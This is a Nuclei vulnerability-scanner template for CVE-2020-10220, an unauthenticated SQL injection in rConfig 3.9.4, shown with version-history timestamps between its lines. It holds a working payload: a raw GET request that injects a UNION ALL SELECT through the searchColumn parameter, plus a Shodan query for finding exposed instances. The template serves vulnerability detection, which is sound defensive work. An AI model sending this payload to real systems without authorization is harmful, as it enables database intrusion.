nuclei-templates/http/cves/2020/CVE-2020-10220.yaml

51 lines
1.7 KiB
YAML
Raw Normal View History

2023-08-31 19:23:15 +00:00
id: CVE-2020-10220
info:
name: rConfig 3.9 - SQL injection
author: ritikchaddha
severity: critical
description: |
An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.
2023-09-06 12:22:36 +00:00
remediation: |
Upgrade to a patched version of rConfig or apply the vendor-supplied patch to mitigate this vulnerability.
2023-08-31 19:23:15 +00:00
reference:
- http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-10220
2023-10-14 11:27:55 +00:00
- http://packetstormsecurity.com/files/156688/rConfig-3.9-SQL-Injection.html
- http://packetstormsecurity.com/files/156766/Rconfig-3.x-Chained-Remote-Code-Execution.html
- https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py
2023-08-31 19:23:15 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2023-09-06 12:22:36 +00:00
cve-id: CVE-2020-10220
2023-08-31 19:23:15 +00:00
cwe-id: CWE-89
2023-10-14 11:27:55 +00:00
epss-score: 0.02204
epss-percentile: 0.88193
2023-10-14 11:27:55 +00:00
cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
2023-08-31 19:23:15 +00:00
metadata:
verified: true
2023-09-06 12:22:36 +00:00
max-request: 1
2023-10-14 11:27:55 +00:00
vendor: rconfig
product: rconfig
2023-08-31 19:23:15 +00:00
shodan-query: title:"rConfig"
2023-10-14 11:27:55 +00:00
tags: packetstorm,cve,cve2020,rconfig,sqli
2023-08-31 19:23:15 +00:00
variables:
num: "999999999"
http:
- raw:
- |
GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1
Host: {{Hostname}}
2023-09-01 02:55:12 +00:00
matchers-condition: and
2023-08-31 19:23:15 +00:00
matchers:
- type: word
part: body
words:
- '{{md5({{num}})}}'
- type: status
status:
- 200